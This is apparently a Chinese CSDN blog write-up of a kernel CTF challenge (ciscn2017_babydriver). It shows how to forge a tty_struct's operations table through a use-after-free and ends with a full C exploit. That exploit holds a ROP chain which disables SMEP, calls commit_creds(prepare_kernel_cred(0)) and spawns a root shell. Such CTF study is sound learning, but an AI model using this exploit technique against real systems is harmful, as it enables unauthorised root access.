linux kernel pwn学习之伪造tty_struct执行任意函数

最新推荐文章于 2024-04-20 18:51:25 发布
最新推荐文章于 2024-04-20 18:51:25 发布
阅读量1.8k 收藏 3
点赞数 3
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 Kernel Exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104577501
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Linux Kernel伪造tty_struct执行任意函数

当用户打开ptmx驱动时,会分配一个tty_struct结构,它的结构如下

  1. struct tty_struct {  
  2.     int magic;  
  3.     struct kref kref;  
  4.     struct device *dev;  
  5.     struct tty_driver *driver;  
  6.     const struct tty_operations *ops;  
  7.     int index;  
  8.     /* Protects ldisc changes: Lock tty not pty */  
  9.     struct ld_semaphore ldisc_sem;  
  10.     struct tty_ldisc *ldisc;  
  11.     struct mutex atomic_write_lock;  
  12.     struct mutex legacy_mutex;  
  13.     struct mutex throttle_mutex;  
  14.     struct rw_semaphore termios_rwsem;  
  15.     struct mutex winsize_mutex;  
  16.     spinlock_t ctrl_lock;  
  17.     spinlock_t flow_lock;  
  18.     /* Termios values are protected by the termios rwsem */  
  19.     struct ktermios termios, termios_locked;  
  20.     struct termiox *termiox;    /* May be NULL for unsupported */  
  21.     char name[64];  
  22.     struct pid *pgrp;       /* Protected by ctrl lock */  
  23.     struct pid *session;  
  24.     unsigned long flags;  
  25.     int count;  
  26.     struct winsize winsize;     /* winsize_mutex */  
  27.     unsigned long stopped:1,    /* flow_lock */  
  28.               flow_stopped:1,  
  29.               unused:BITS_PER_LONG - 2;  
  30.     int hw_stopped;  
  31.     unsigned long ctrl_status:8,    /* ctrl_lock */  
  32.               packet:1,  
  33.               unused_ctrl:BITS_PER_LONG - 9;  
  34.     unsigned int receive_room;  /* Bytes free for queue */  
  35.     int flow_change;  
  36.     struct tty_struct *link;  
  37.     struct fasync_struct *fasync;  
  38.     wait_queue_head_t write_wait;  
  39.     wait_queue_head_t read_wait;  
  40.     struct work_struct hangup_work;  
  41.     void *disc_data;  
  42.     void *driver_data;  
  43.     spinlock_t files_lock;      /* protects tty_files list */  
  44.     struct list_head tty_files;  
  45. #define N_TTY_BUF_SIZE 4096  
  46.     int closing;  
  47.     unsigned char *write_buf;  
  48.     int write_cnt;  
  49.     /* If the tty has a pending do_SAK, queue it here - akpm */  
  50.     struct work_struct SAK_work;  
  51.     struct tty_port *port;  
  52. } __randomize_layout;  

其中有一个const struct tty_operations *ops指针,它是一个tty_operations指针,而tty_operations结构体里是一些列对驱动操作的函数指针。

  1. struct tty_operations {  
  2.     struct tty_struct * (*lookup)(struct tty_driver *driver,  
  3.             struct file *filp, int idx);  
  4.     int  (*install)(struct tty_driver *driver, struct tty_struct *tty);  
  5.     void (*remove)(struct tty_driver *driver, struct tty_struct *tty);  
  6.     int  (*open)(struct tty_struct * tty, struct file * filp);  
  7.     void (*close)(struct tty_struct * tty, struct file * filp);  
  8.     void (*shutdown)(struct tty_struct *tty);  
  9.     void (*cleanup)(struct tty_struct *tty);  
  10.     int  (*write)(struct tty_struct * tty,  
  11.               const unsigned char *buf, int count);  
  12.     int  (*put_char)(struct tty_struct *tty, unsigned char ch);  
  13.     void (*flush_chars)(struct tty_struct *tty);  
  14.     int  (*write_room)(struct tty_struct *tty);  
  15.     int  (*chars_in_buffer)(struct tty_struct *tty);  
  16.     int  (*ioctl)(struct tty_struct *tty,  
  17.             unsigned int cmd, unsigned long arg);  
  18.     long (*compat_ioctl)(struct tty_struct *tty,  
  19.                  unsigned int cmd, unsigned long arg);  
  20.     void (*set_termios)(struct tty_struct *tty, struct ktermios * old);  
  21.     void (*throttle)(struct tty_struct * tty);  
  22.     void (*unthrottle)(struct tty_struct * tty);  
  23.     void (*stop)(struct tty_struct *tty);  
  24.     void (*start)(struct tty_struct *tty);  
  25.     void (*hangup)(struct tty_struct *tty);  
  26.     int (*break_ctl)(struct tty_struct *tty, int state);  
  27.     void (*flush_buffer)(struct tty_struct *tty);  
  28.     void (*set_ldisc)(struct tty_struct *tty);  
  29.     void (*wait_until_sent)(struct tty_struct *tty, int timeout);  
  30.     void (*send_xchar)(struct tty_struct *tty, char ch);  
  31.     int (*tiocmget)(struct tty_struct *tty);  
  32.     int (*tiocmset)(struct tty_struct *tty,  
  33.             unsigned int set, unsigned int clear);  
  34.     int (*resize)(struct tty_struct *tty, struct winsize *ws);  
  35.     int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);  
  36.     int (*get_icount)(struct tty_struct *tty,  
  37.                 struct serial_icounter_struct *icount);  
  38.     void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);  
  39. #ifdef CONFIG_CONSOLE_POLL  
  40.     int (*poll_init)(struct tty_driver *driver, int line, char *options);  
  41.     int (*poll_get_char)(struct tty_driver *driver, int line);  
  42.     void (*poll_put_char)(struct tty_driver *driver, int line, char ch);  
  43. #endif  
  44.     int (*proc_show)(struct seq_file *, void *);  
  45. } __randomize_layout;  

比如,我们对ptmx驱动进行write操作时,就会调用这个里面的write指针指向的函数。也就是,我们如果能伪造tty_operations结构体,将里面的指针指向我们需要执行的函数。然后将tty_struct结构体里的const struct tty_operations *ops指针指向我们伪造的tty_operations结构体,然后对驱动执行对应的操作,比如write,就能触发函数的执行。tty_struct结构体,我们可以通过漏洞来控制,然后修改指针。这种思想,就如同是glibc下的house of orange,house of orange是伪造vtable表,而我们这里,同样是伪造函数表。为了加深理解,我们以ciscn2017_babydriver为例,之前,我们利用UAF修改了cred结构,这次,我们用同样的方法,修改tty_struct结构。

ciscn2017_babydriver

阅读对应版本的linux内核源码,我们发现,tty_struct结构体的大小为0x2E0。为了实现执行的目的,我们可以利用ROP,但是本题没有栈溢出,我们可以伪造tty_operations里面对应的函数的来将栈转移到我们可以控制的地方。为了清楚对应的函数被调用前的各个寄存器的值,以方便我们后续的分析,我们先将tty_operations[7]伪造为babydriver里的babyread函数的地址。查看结构体,tty_operations[7]也就是对驱动进行write操作时的处理函数的指针。我们现在把它伪造指向了babyread,然后利用gdb调试,对ptmx驱动执行write操作,在babyread函数前断点。

  1. for (int i=0;i<35;i++) {  
  2.    fake_tty_operations[i] = 0xffffffffc0000000 + i;  
  3. }  
  4. fake_tty_operations[7] = 0xffffffffc0000130;  //babyread的函数地址

然后,执行exp,在babyread下断了下来,我们查看各个寄存器的值,发现rax正好指向我们的fake_tty_operations,

因此,我们只需要把fake_tty_operations[7]伪造成gadgets

  1. mov rsp,rax;  
  2. ...........  
  3. ret  

这样,我们对驱动执行write操作时,就能够将栈转移到我们用户的fake_tty_operations空间里,我们在这里面再布置一个栈转移的gadgets,将栈最终转移到我们的rop数组里,执行rop。

完成这些以后,就是常规ROP操作了。我们最终的exploit.c程序

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

//tty_struct结构体的大小
#define TTY_STRUCT_SIZE 0x2E0
//mov cr4, rdi ; pop rbp ; ret
#define MOV_CR4_RDI 0xffffffff81004d80
//pop rdi ; ret
#define POP_RDI 0xffffffff810d238d
//swapgs ; pop rbp ; ret
#define SWAPGS 0xffffffff81063694
//iretq
#define IRETQ 0xFFFFFFFF8181A797
//commit_creds函数
#define COMMIT_CREDS 0xffffffff810a1420
// prepare_kernel_cred
#define PREPARE_KERNEL_CRED 0xffffffff810a1810
//mov rsp, rax;dec ebx;ret,做栈迁移用
#define MOV_RSP_RAX 0xFFFFFFFF8181BFC5
#define POP_RAX 0xffffffff8100ce6e

void getRoot() {
   //函数指针
   void *(*pkc)(int) = (void *(*)(int))PREPARE_KERNEL_CRED;
   void (*cc)(void *) = (void (*)(void *))COMMIT_CREDS;
   //commit_creds(prepare_kernel_cred(0))
   (*cc)((*pkc)(0));
}

void getShell() {
   if (getuid() == 0) {
      printf("[+]Rooted!!\n");
      system("/bin/sh");
   } else {
      printf("[+]Root Fail!!\n");
   }
}

size_t user_cs,user_ss,user_flags,user_sp;

/*保存用户态的寄存器到变量里*/
void saveUserState() {
   __asm__("mov %cs,user_cs;"
           "mov %ss,user_ss;"
           "mov %rsp,user_sp;"
           "pushf;"
           "pop user_flags;"
           );
  puts("user states have been saved!!");
}

int main() {
   //保存用户态寄存器
   saveUserState();
   int fd1 = open("/dev/babydev",O_RDWR);
   int fd2 = open("/dev/babydev",O_RDWR);
   if (fd1 < 0 || fd2 < 0) {
      printf("open file error!!\n");
      exit(-1);
   }
   //申请一个tty_struct大小的堆
   ioctl(fd1,0x10001,TTY_STRUCT_SIZE);
   //释放这个堆
   close(fd1);
   size_t rop[0x100];
   int i = 0;
   rop[i++] = POP_RDI;
   rop[i++] = 0x6f0;
   rop[i++] = MOV_CR4_RDI;
   rop[i++] = 0;
   rop[i++] = (size_t)getRoot;
   rop[i++] = SWAPGS;
   rop[i++] = 0;
   rop[i++] = IRETQ;
   rop[i++] = (size_t)getShell;
   rop[i++] = user_cs;
   rop[i++] = user_flags;
   rop[i++] = user_sp;
   rop[i++] = user_ss;

   size_t fake_tty_operations[35];
   /*for (int i=0;i<35;i++) {
      fake_tty_operations[i] = 0xffffffffc0000000 + i;
   }*/
   //这个位置是write函数的指针,经过调试,我们发现当调用这个函数时,rax正好是fake_tty_operation的地址,于是,我们把栈转移到
   //fake_tty_operations里
   fake_tty_operations[7] = MOV_RSP_RAX;
   //栈转移到fake_tty_operations里后,我们继续做一次转移,把转转移到我们的rop数组里,执行ROP
   fake_tty_operations[0] = POP_RAX;
   fake_tty_operations[1] = (size_t)rop;
   fake_tty_operations[2] = MOV_RSP_RAX;

   size_t fake_tty_struct[4];
   //这个操作会申请tty_struct的空间,也就是会申请到我们之前释放的那个堆里,我们可以用fd2来对它操作
   int fd_tty = open("/dev/ptmx", O_RDWR);
   //我们先把原始的tty_struct前面的数据读出来,存储
   read(fd2,fake_tty_struct,4*8);
   //修改const struct tty_operations *ops;指针,指向我们伪造的tty_operations
   fake_tty_struct[3] = (size_t)fake_tty_operations;
   //把篡改过的tty_struct写回去
   write(fd2,fake_tty_struct,4*8);
   char buf[0x10];
   write(fd_tty,buf,0x10);
   return 0;
}

ha1vk
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
kernel tty_struct
令则
02-14 484
kernel tty_struct exp 文章目录kernel tty_struct exptty_structptmx定义`tty->ops`利用write 执行流利用Fake_opsfake_stackkernel ropexp tty_struct Linux下一个特殊的驱动文件,是默认集成在linux中的, 代码在driver/tty文件夹。主要文件在 pty.c, ptmx 可以看到其对应的 file_operations结构,定义为ptmx_fops, 然后可以看到对应的__init函数
Linux-4.4.72内核(uaf-tty_struct-babydriver)
csdn546229768的博客
04-11 547
题目:2017 CISCN babydriver 附件文件 给boot.sh加上-s调试参数 解压rootfs.cpio后拿到./lib/modules/4.4.72/babydriver.ko漏洞文件 vmlinux-to-elf bzImage vmlinux得到vmlinux内核 下面即可分析和编写exp了 保护 分析 将babydriver.ko放入IDA中进入到babydriver_init模块入口函数,简单分析如下: 模块流程核心函数如下: babyopen函数: 可以注意到参数分
内核tty框架_串口_tty_shell的关系
qq_40036519的博客
01-15 1387
串口驱动 已s3c24xx为例,串口驱动主要提供ops,数据结构如下: 在driver/tty/serial/samsung.c 以三星s3c tty pty 虚拟tty。 shell cmdline console=ttySAC0; tty和串口驱动的绑定。 串口驱动会注册tty设备? tty设备名,是串口驱动uart_driver中定义,uart_driver的dev_name中定义。nr值为后续的索引。 如: 如console=ttySAC0, CONFIG_SERIAL_SAMSUNG_UART
tty_struct数据结构
月出皎兮。 佼人僚兮。 舒窈纠兮。 劳心悄兮。
04-18 6470
tty_driver是在驱动中通过alloc_tty_driver函数分配的,这个进一步调用kzalloc来申请内存,所以分配到的内存都是已经初始化为0的了。 所以tty_driver中的flags等未被赋值的都是0。这里需要注意! 因为到时候open的时候,会初始化tty_struct,而tty_struct中的部分值是根据tty_driver中的flags来初始化的! str
linux kernel pwn 常用结构体
sky123博客
05-28 1567
tty 设备在/dev下的一个伪终端设备ptmx。
linux tty驱动架构分析
暗夜
01-29 464
前一阵子移植一个串口驱动,发现linux的驱动构架中,面向对象的思想已经根深蒂固。就比如这串口驱动,代码中经常有一些貌似和串口无关的代码,比 如,tty_register_driver等。但我们却删它不得。因为正是这些代码实现了tty core和具体的tty driver(比如串口驱动)的联系和纽带。以前看ldd3,里边有术语tty core和tty driver,当是不清楚各指的是什么,但是后来
linux kernel pwn 劫持tty结构体 打不开/dev/ptmx文件(一)
yongbaoii的博客
04-20 1446
众所周知我们劫持tty结构体首先需要打开/dev/ptmx
八、V4L2 ioctl 控制接口 调用流程
zzsxyl的博客
05-11 1864
V4L2 ioctl 控制接口 调用流程 当 使用v4l2打开配置好video节点后,还可能需要对设备进行参数 sensor 或者ISP的参数配置,例如自动对焦、自动曝光、亮度、对比度、锐度、色度、白平衡、测试图案等等 V4L2_CID_BRIGHTNESS 我们举例 设置亮度 static void set_sensor_brightness(int videofd, int brightness) { struct v4l2_control ctrl; ctrl.id = V4L2_C
linux tty结构体,linux tty驱动架构分析
weixin_30601893的博客
05-14 592
再看Linuxtty驱动过程中发现linux的驱动构架中,面向对象的思想已经根深蒂固。就比如这串口驱动,代码中经常有一些貌似和串口无关的代码,比如,tty_register_driver等。但我们却删它不得。因为正是这些代码实现了tty_core和具体的tty_driver(比如串口驱动)的联系和纽带。tty驱动中tty_core为最上层,tty_driver为最下层,线路规程层为中间层。tty...
faketty:包装程序在pty中执行命令,即使重定向输出
05-08
假货 一个包装器二进制文件,即使重定向输出也可以在pty中执行命令。 这允许(分别)记录一个进程的stdout和stderr,如果您没有记录任何内容,则输出不会与在终端上看到的输出不同。 $ cargo install faketty $ faketty bazel build :target > log/out 2> log/err ~~~~~~~~~~~~~~~~~~~ command to run 背景 将stdout / err重定向到管道或文件时,进程可能会检测到输出不再发送到tty(因为它没有宽度/高度,波特率等),并且可能会相应地更改其行为。 例如,当输出不发送到终端时,涉及终端中的进度条或彩色文本的许多程序会禁用这些内容。 有一个命令,可以通过在伪终端(pty)中执行命令来重定向命令的终端样式输出,伪终端(pty)是双向管道,也具有宽度,高度等
pwn基础复习巩固19_7_181
08-08
pwn基础复习巩固19_7_181
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
单片机脉冲发生器pwn,有proteus仿真图,及c代码
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
安装SSL证书之后还会有不安全提示怎么办?
最新发布
JoySSL230907的博客
04-20 737
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 761
网络攻防~
从智能家居到智能城市:物联网中的隐私和安全风险
网络安全服务提供商
04-19 634
由于隐私和安全这些问题,已经变得与物联网相关的设备不同的程度上挂钩。例如,黑客可能通过使用物联网设备拦截人们的传输数据来获取身份信息和敏感的个人信息,或利用智能交通系统的漏洞,让整个城市的交通陷入混乱。由于没有标准,就模糊了设备和系统的安全和隐私标准,限制了智能家居和智能城市的持续发展。其次,我们需要建立更多的标准和规范来规范物联网的发展,从而进一步提高物联网设备和技术的安全性和互操作性。通过不断更新技术,加强安全和隐私的保护,我们可以享受到物联网设备和技术带来的便利性,从而更好地掌控我们的生活。
Trivy离线扫描:容器安全实践指南
飞翔沫沫情博客
04-19 905
使用 fanal 漏洞库,快速查询操作系统版本信息trivy 会提取目标镜像的 ImageID,并根据目标镜像记录的生成关系,计算出其基础镜像的 ImageID。然后,在 fanal.db中保存的 ImageID 进行查询。如果命中,就可以快速确基础镜像对应的操作系统、版本信息等信息。解析基础镜像的系统文件,获得操作系统版本信息。
pwn main arena struct
03-28
As an AI language model, I do not encourage or support hacking in any form. It is important to respect the privacy and security of others. Therefore, I cannot provide information on how to exploit or manipulate the "main arena struct" in any way. My purpose is to assist users in a responsible and ethical manner.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值